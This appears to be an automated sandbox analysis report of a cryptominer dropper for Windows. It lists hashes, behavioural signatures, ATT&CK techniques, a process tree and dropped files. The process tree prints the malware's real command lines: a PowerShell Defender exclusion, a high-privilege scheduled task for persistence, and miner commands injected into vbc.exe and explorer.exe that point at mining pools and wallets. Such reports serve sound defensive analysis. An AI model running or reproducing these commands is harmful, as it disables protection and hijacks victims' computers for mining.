2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536

Analysis

max time kernel
297s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
24/09/2022, 22:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe
Size

861KB
MD5

2d0b3156196bbd5df81d32c03fbb50ec
SHA1

2c0f76119a6f47ab0512cc7511213a75f8ad04c3
SHA256

2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536
SHA512

8011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260
SSDEEP

6144:PvziFSXpvg8dhIheZZ1IZfgo7bx2jC/Yx4n0fdWHqqEXgiKJ2wm3sQLU8uZq1QNM:1Zv0ozIiYbIb4lHc/a0YZg9Bj

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1700	DHUZT.exe
1904	DHUZT.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1716-101-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral1/memory/1716-103-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral1/memory/1716-104-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral1/memory/1716-106-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx

Loads dropped DLL 1 IoCs

pid	Process
1116	cmd.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1700 set thread context of 2012	1700	DHUZT.exe	39
PID 1700 set thread context of 1716	1700	DHUZT.exe	42

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1276	schtasks.exe
1408	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1976	timeout.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2036	powershell.exe
1316	powershell.exe
1700	DHUZT.exe
1700	DHUZT.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1756	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	1700	DHUZT.exe
Token: SeDebugPrivilege	1316	powershell.exe

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 1756 wrote to memory of 2036	1756	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe	27
PID 1756 wrote to memory of 2036	1756	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe	27
PID 1756 wrote to memory of 2036	1756	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe	27
PID 1756 wrote to memory of 1116	1756	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe	29
PID 1756 wrote to memory of 1116	1756	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe	29
PID 1756 wrote to memory of 1116	1756	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe	29
PID 1116 wrote to memory of 1976	1116	cmd.exe	31
PID 1116 wrote to memory of 1976	1116	cmd.exe	31
PID 1116 wrote to memory of 1976	1116	cmd.exe	31
PID 1116 wrote to memory of 1700	1116	cmd.exe	32
PID 1116 wrote to memory of 1700	1116	cmd.exe	32
PID 1116 wrote to memory of 1700	1116	cmd.exe	32
PID 1700 wrote to memory of 1316	1700	DHUZT.exe	34
PID 1700 wrote to memory of 1316	1700	DHUZT.exe	34
PID 1700 wrote to memory of 1316	1700	DHUZT.exe	34
PID 1700 wrote to memory of 832	1700	DHUZT.exe	37
PID 1700 wrote to memory of 832	1700	DHUZT.exe	37
PID 1700 wrote to memory of 832	1700	DHUZT.exe	37
PID 832 wrote to memory of 1408	832	cmd.exe	36
PID 832 wrote to memory of 1408	832	cmd.exe	36
PID 832 wrote to memory of 1408	832	cmd.exe	36
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 1700 wrote to memory of 2012	1700	DHUZT.exe	39
PID 2012 wrote to memory of 1124	2012	vbc.exe	41
PID 2012 wrote to memory of 1124	2012	vbc.exe	41
PID 2012 wrote to memory of 1124	2012	vbc.exe	41
PID 1700 wrote to memory of 1716	1700	DHUZT.exe	42
PID 1700 wrote to memory of 1716	1700	DHUZT.exe	42
PID 1700 wrote to memory of 1716	1700	DHUZT.exe	42
PID 1700 wrote to memory of 1716	1700	DHUZT.exe	42
PID 1700 wrote to memory of 1716	1700	DHUZT.exe	42
PID 1700 wrote to memory of 1716	1700	DHUZT.exe	42
PID 1700 wrote to memory of 1716	1700	DHUZT.exe	42
PID 1004 wrote to memory of 1904	1004	taskeng.exe	44
PID 1004 wrote to memory of 1904	1004	taskeng.exe	44
PID 1004 wrote to memory of 1904	1004	taskeng.exe	44

C:\Users\Admin\AppData\Local\Temp\2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe
"C:\Users\Admin\AppData\Local\Temp\2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A3.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1116
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1976
- - C:\ProgramData\ccl\DHUZT.exe
    "C:\ProgramData\ccl\DHUZT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1316
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:832
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 7
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:1124
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --algo AUTOLYKOS2 --pool stratum-ergo.flypool.org:3333 --user 9iBvw2uK1JJsATyKTNiKktuaQoekhEZFedBvKvsoL36t4dsjmLu.apocalypse
      4⤵
      PID:1716

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
1⤵
- Creates scheduled task(s)
PID:1408

C:\Windows\system32\taskeng.exe
taskeng.exe {4E84CA1A-2F96-4541-ACBB-BCF2D1BD3167} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1004
- C:\ProgramData\ccl\DHUZT.exe
  C:\ProgramData\ccl\DHUZT.exe
  2⤵
  - Executes dropped EXE
  PID:1904
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
    3⤵
    PID:1996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    PID:1876
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 7
    3⤵
    PID:940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:1160

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
1⤵
- Creates scheduled task(s)
PID:1276

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
2d0b3156196bbd5df81d32c03fbb50ec

SHA1
2c0f76119a6f47ab0512cc7511213a75f8ad04c3

SHA256
2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536

SHA512
8011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
2d0b3156196bbd5df81d32c03fbb50ec

SHA1
2c0f76119a6f47ab0512cc7511213a75f8ad04c3

SHA256
2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536

SHA512
8011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
2d0b3156196bbd5df81d32c03fbb50ec

SHA1
2c0f76119a6f47ab0512cc7511213a75f8ad04c3

SHA256
2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536

SHA512
8011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260

Download Submit
C:\ProgramData\ccl\chromium.dat

Filesize
386KB

MD5
b447cdc6fdce1fe450c1c746218cd4b2

SHA1
f1aa7aae895c7727d2184d885854c949d00ab561

SHA256
63074c03de19a055b423d906af02c1836f2ece77a9c143e7c36827e0adbb54b6

SHA512
0f6263c99d241f05317af0da38b09c32e6e921bfa9ff2df6e5a7821fbd8875c467f2e7c252e08885af08b6a7cb3b5c4315cf0162f7c2a5ce4ec00e69dfad5b26

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4A3.tmp.bat

Filesize
136B

MD5
d39bba612338be9c4322d2afa16a6b04

SHA1
e1e573d044920aa5eaccde1ccfdd9d91c07e2b77

SHA256
fc155f7c9f7b8dbfcd9ccabd7b4d68749a780506b28cfedd0645d9ebce6180f1

SHA512
a175fe57eebf7cd672c5668ab9ec1945044c3d63acc6a1f144c78f6fcf9bc44fdec915bf25612643d831bbfa589806fd528bd17d3eb819bf96c1da03e859eb6f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f6f1e53936dc581c1799ebfca570bf65

SHA1
87dbe7b4ba8d6617d57c2f9d7874bfb346505c0e

SHA256
4fc616be333448d44043329a0c7a3590ab0b45669ce8ec9b3cb437be41c44574

SHA512
498b722bc5eca222c87596e5d31c465ae7af178ad0d1ab201a1f15d5f38bec763d777a68c85f1056a8851294248792e65dd8264db09565fb8901264e2e6d3f5b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f6f1e53936dc581c1799ebfca570bf65

SHA1
87dbe7b4ba8d6617d57c2f9d7874bfb346505c0e

SHA256
4fc616be333448d44043329a0c7a3590ab0b45669ce8ec9b3cb437be41c44574

SHA512
498b722bc5eca222c87596e5d31c465ae7af178ad0d1ab201a1f15d5f38bec763d777a68c85f1056a8851294248792e65dd8264db09565fb8901264e2e6d3f5b

Download Submit
\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
2d0b3156196bbd5df81d32c03fbb50ec

SHA1
2c0f76119a6f47ab0512cc7511213a75f8ad04c3

SHA256
2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536

SHA512
8011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260

Download Submit
memory/940-139-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/940-137-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1316-75-0x000007FEEDA90000-0x000007FEEE4B3000-memory.dmp

Filesize
10.1MB

Download
memory/1316-76-0x000007FEECF30000-0x000007FEEDA8D000-memory.dmp

Filesize
11.4MB

Download
memory/1316-78-0x000000000273B000-0x000000000275A000-memory.dmp

Filesize
124KB

Download
memory/1316-77-0x0000000002734000-0x0000000002737000-memory.dmp

Filesize
12KB

Download
memory/1700-68-0x0000000000090000-0x000000000016C000-memory.dmp

Filesize
880KB

Download
memory/1716-106-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1716-101-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1716-103-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1716-100-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1716-104-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1756-54-0x0000000000D50000-0x0000000000E2C000-memory.dmp

Filesize
880KB

Download
memory/1876-117-0x000007FEEBBB0000-0x000007FEEC70D000-memory.dmp

Filesize
11.4MB

Download
memory/1876-116-0x000007FEEC710000-0x000007FEED133000-memory.dmp

Filesize
10.1MB

Download
memory/1904-109-0x0000000000D00000-0x0000000000DDC000-memory.dmp

Filesize
880KB

Download
memory/2012-87-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-89-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-82-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-85-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-80-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-97-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-84-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-90-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-93-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-79-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-94-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-99-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-88-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2012-91-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2036-62-0x0000000002904000-0x0000000002907000-memory.dmp

Filesize
12KB

Download
memory/2036-61-0x000007FEF57E0000-0x000007FEF633D000-memory.dmp

Filesize
11.4MB

Download
memory/2036-60-0x000007FEED160000-0x000007FEEDB83000-memory.dmp

Filesize
10.1MB

Download
memory/2036-63-0x000000000290B000-0x000000000292A000-memory.dmp

Filesize
124KB

Download
memory/2036-56-0x000007FEFC521000-0x000007FEFC523000-memory.dmp

Filesize
8KB

Download